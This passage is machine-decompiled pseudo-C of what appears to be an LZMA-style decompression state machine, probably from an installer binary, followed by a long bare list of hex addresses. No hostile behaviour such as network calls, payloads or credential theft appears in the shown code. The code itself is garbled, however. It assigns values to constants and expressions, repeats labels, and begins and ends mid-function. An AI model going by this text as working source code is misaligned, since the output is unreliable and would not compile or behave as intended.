												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406bf5
0x00406bf5
0x00406bf9
0x00406c1a
0x00406c21
0x00406c27
0x00406c2d
0x00406c3f
0x00406c45
0x00406c4a
0x00000000
0x00406bfb
0x00406c01
0x00406fc2
0x00406fc2
0x00406fc2
0x00406fc5
0x00406fc5
0x00406fc5
0x00406fcb
0x00406fd1
0x00406fd7
0x00406ff1
0x00406ff4
0x00406ffa
0x00407005
0x00407007
0x00406fd9
0x00406fd9
0x00406fe8
0x00406fec
0x00406fec
0x00407011
0x00000000
0x00000000
0x00407013
0x00407017
0x004071c6
0x004071dc
0x004071e4
0x004071eb
0x004071ed
0x004071f4
0x004071f8
0x004071f8
0x00407023
0x0040702a
0x00407032
0x00407035
0x00407038
0x00407038
0x0040703e
0x0040703e
0x004067da
0x004067da
0x004067da
0x004067e3
0x00000000
0x00000000
0x004067e9
0x00000000
0x004067f4
0x00000000
0x00000000
0x004067fd
0x00406800
0x00406803
0x00406807
0x00000000
0x00000000
0x0040680d
0x00406810
0x00406812
0x00406813
0x00406816
0x00406818
0x00406819
0x0040681b
0x0040681e
0x00406823
0x00406828
0x00406831
0x00406844
0x00406847
0x00406853
0x0040687b
0x0040687d
0x0040688b
0x0040688b
0x0040688f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040687f
0x0040687f
0x00406882
0x00406883
0x00406883
0x00000000
0x0040687f
0x00406859
0x0040685e
0x0040685e
0x00406867
0x0040686f
0x00406872
0x00000000
0x00406878
0x00406878
0x00000000
0x00406878
0x00000000
0x00406895
0x00406895
0x00406899
0x00407145
0x00000000
0x00407145
0x004068a2
0x004068b2
0x004068b5
0x004068b8
0x004068b8
0x004068b8
0x004068bb
0x004068bf
0x00000000
0x00000000
0x004068c1
0x004068c7
0x004068f1
0x004068f7
0x004068fe
0x00000000
0x004068fe
0x004068cd
0x004068d0
0x004068d5
0x004068d5
0x004068e0
0x004068e8
0x004068eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406930
0x00406936
0x00406939
0x00406946
0x0040694e
0x00000000
0x00000000
0x00406905
0x00406905
0x00406909
0x00407154
0x00000000
0x00407154
0x00406915
0x00406920
0x00406920
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fc5
0x00406fc5
0x00406fcb
0x00406fd1
0x00406fd7
0x00406ff1
0x00406ff4
0x00406ffa
0x00407005
0x00407007
0x00406fd9
0x00406fd9
0x00406fe8
0x00406fec
0x00406fec
0x00407011
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406956
0x00406958
0x0040695b
0x004069cc
0x004069cf
0x004069d2
0x004069d9
0x004069e3
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x0040695d
0x00406961
0x00406964
0x00406966
0x00406969
0x0040696c
0x0040696e
0x00406971
0x00406973
0x00406978
0x0040697b
0x0040697e
0x00406982
0x00406989
0x0040698c
0x00406993
0x00406997
0x0040699f
0x0040699f
0x0040699f
0x00406999
0x00406999
0x00406999
0x0040698e
0x0040698e
0x0040698e
0x004069a3
0x004069a6
0x004069c4
0x004069c6
0x00000000
0x004069a8
0x004069a8
0x004069ab
0x004069ae
0x004069b1
0x004069b3
0x004069b3
0x004069b3
0x004069b6
0x004069b9
0x004069bb
0x004069bc
0x004069bf
0x00000000
0x004069bf
0x00000000
0x00000000
0x00000000
0x00406c5f
0x00406c63
0x00406c86
0x00406c89
0x00406c8c
0x00406c96
0x00406c65
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c7b
0x00406c7e
0x00406c7e
0x00406fc2
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00000000
0x00406ca2
0x00406ca6
0x00000000
0x00000000
0x00406cac
0x00406cb0
0x00000000
0x00000000
0x00406cb6
0x00406cb8
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc3
0x00000000
0x00000000
0x00406d13
0x00406d17
